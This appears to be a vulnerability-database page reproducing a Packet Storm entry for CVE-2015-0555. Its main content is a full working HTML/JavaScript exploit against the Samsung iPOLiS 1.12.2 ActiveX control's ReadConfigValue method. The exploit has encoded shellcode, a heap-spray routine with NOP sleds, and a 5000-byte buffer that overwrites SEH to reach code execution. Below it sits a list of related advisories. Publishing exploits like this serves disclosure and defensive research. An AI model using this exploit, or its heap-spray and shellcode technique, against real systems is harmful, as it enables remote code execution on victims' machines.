Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPraveen DarshanamPACKETSTORM:131421
HistoryApr 15, 2015 - 12:00 a.m.

Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution

2015-04-1500:00:00
Praveen Darshanam
packetstormsecurity.com
24

0.111 Low

EPSS

Percentile

95.2%

JSON
`<html>  
<!--  
Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx  
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)  
CVE: 2015-0555  
Author: Praveen Darshanam  
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html  
http://darshanams.blogspot.com/  
Tested on Windows XP SP3 IE6/7  
Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials  
-->  
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>  
<script>  
  
var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');  
var bigblock = unescape('%u9090%u9090');  
var headersize = 20;  
var slackspace = headersize + shellcode.length;  
while (bigblock.length < slackspace) bigblock += bigblock;  
  
var fillblock = bigblock.substring(0,slackspace);  
var block = bigblock.substring(0,bigblock.length - slackspace);  
while (block.length + slackspace < 0x40000) block = block + block + fillblock;  
  
var memory = new Array();  
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }  
  
// SEH and nSEH will point to 0x06060606  
// 0x06060606 will point to (nops+shellcode) chunk  
var hbuff = "";  
for (i = 0; i <5000; i++)  
{  
hbuff += "\x06";  
}  
  
// trigget crash  
target.ReadConfigValue(hbuff);  
</script>  
</html>  
  
`

Related

cve 1
exploitpack 1
cvelist 1
saint 4
checkpoint_advisories 1
nvd 1
zdt 1
openvas 1
prion 1
exploitdb 1
packetstorm 1
cve
cve
CVE-2015-0555
2015-02-24 15:59:04
exploitpack
exploitpack
Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
2015-02-22 00:00:00
cvelist
cvelist
CVE-2015-0555
2015-02-24 15:00:00
saint
saint
Samsung iPOLiS Device Manager ReadConfigValue vulnerability
2015-04-27 00:00:00
Samsung iPOLiS Device Manager ReadConfigValue vulnerability
2015-04-27 00:00:00
Samsung iPOLiS Device Manager ReadConfigValue vulnerability
2015-04-27 00:00:00
checkpoint_advisories
checkpoint_advisories
Samsung iPOLiS Device Manager WriteConfigValue Stack Buffer Overflow (CVE-2015-0555)
2015-03-29 00:00:00
nvd
nvd
CVE-2015-0555
2015-02-24 15:59:04
zdt
zdt
Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC
2015-02-23 00:00:00
openvas
openvas
Samsung iPOLiS Device Manager Buffer Overflow Vulnerability
2015-03-20 00:00:00
prion
prion
Buffer overflow
2015-02-24 15:59:00
exploitdb
exploitdb
Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
2015-02-22 00:00:00
packetstorm
packetstorm
Samsung iPolis Buffer Overflow
2015-02-21 00:00:00

0.111 Low

EPSS

Percentile

95.2%

JSON
Related for PACKETSTORM:131421
cve1exploitpack1cvelist1saint4checkpoint_advisories1nvd1zdt1openvas1prion1exploitdb1packetstorm1